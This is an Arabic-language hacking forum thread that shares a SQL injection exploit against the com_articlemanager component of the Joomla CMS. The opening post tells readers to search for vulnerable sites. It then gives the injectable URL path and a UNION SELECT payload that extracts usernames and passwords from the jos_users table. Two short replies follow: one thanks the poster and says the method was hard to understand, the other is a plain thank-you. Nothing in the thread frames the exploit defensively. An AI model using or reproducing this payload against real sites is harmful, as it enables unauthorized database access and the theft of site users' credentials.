السلام عليكم ورحمة الله وبركاته جبت لكم اليوم ثغرة في سكريبت جمولة الثغرة من نوع SQL INJECTION الذي يعشقها الكثير نبدأ دورك البحث عن المواقع...

M!M0

New Member
ثغرة في سكريبت جمولة
السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت جمولة

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

PHP:
index.php?option=com_articlemanager&Itemid=349&task=display&artid=
طريقة الإستغلال

PHP:
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
الثغرة من إكتشاف

FL0RiX


إن شاء الله تستفيدوا

موفقين بإذن الله ...​
 

Dr.NaNo

New Member
ثغرة في سكريبت جمولة
بارك الله فيك أخي على الثغرة بس انا مريت عليها اول بس مافهمت كيف طريقة الاستغلال [ صعب ، شوي ] :)


تحياتي لكـ ياغالي :)
 

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغرة في سكريبت جمولة
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
 
أعلى